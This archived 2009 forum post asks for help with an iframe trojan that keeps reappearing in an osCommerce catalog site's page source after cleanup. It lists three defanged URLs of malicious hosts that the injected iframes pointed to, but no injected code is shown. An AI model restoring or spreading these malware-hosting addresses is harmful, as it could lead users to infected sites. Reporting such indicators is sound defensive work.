Iframe Trojan - continued

fengshui37 · January 26, 2009

Still haven't found a solution (or gotten an answer on how the iframe coding is being inserted into the "page source" at the OS-C catalog site)......topic Iframe Trojan Present has dropped several pages down the queue and responses stopped so I'm re-initiating it...Thanks...

My client was recently informed by AUScert that her website was hosting malicious content.....specifically iframes that pointed to links as follows (Here and below, I have masked and incorrectly formated them so these are NOT the exact links):

>> hxxp://msn-analytics. net/count.php?o=2

>> hxxp://pinoc. org/count.php?o=2

>> hxxp://wsxhost. net/count.php?o=2

were being inserted into the html coding for many pages.

I believe we fixed the problem that allowed it to get in there in first place and with hours of work, removed all instances of the code and finally removed a couple of php scripts that had been installed on the server which we believe were allowing the unwanted access.

The only problem is that the iframe code is STILL present in source code for the catalog site (oscommerce). I downloaded EVERY single file associated with the catalog site and searched it for instances of "pinoc" and "wsxhost" and also decimal, hexadecimal, and binary ASCII representations of those letters and found no instances of it in the oscommerce files BUT it is still showing up in source code.

The code is inserted in very first line of the source i.e:

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<head>

Thanks,

- Fengshui37

Iframe Trojan - continued

Recommended Posts

fengshui37

Archived

Browse

Activity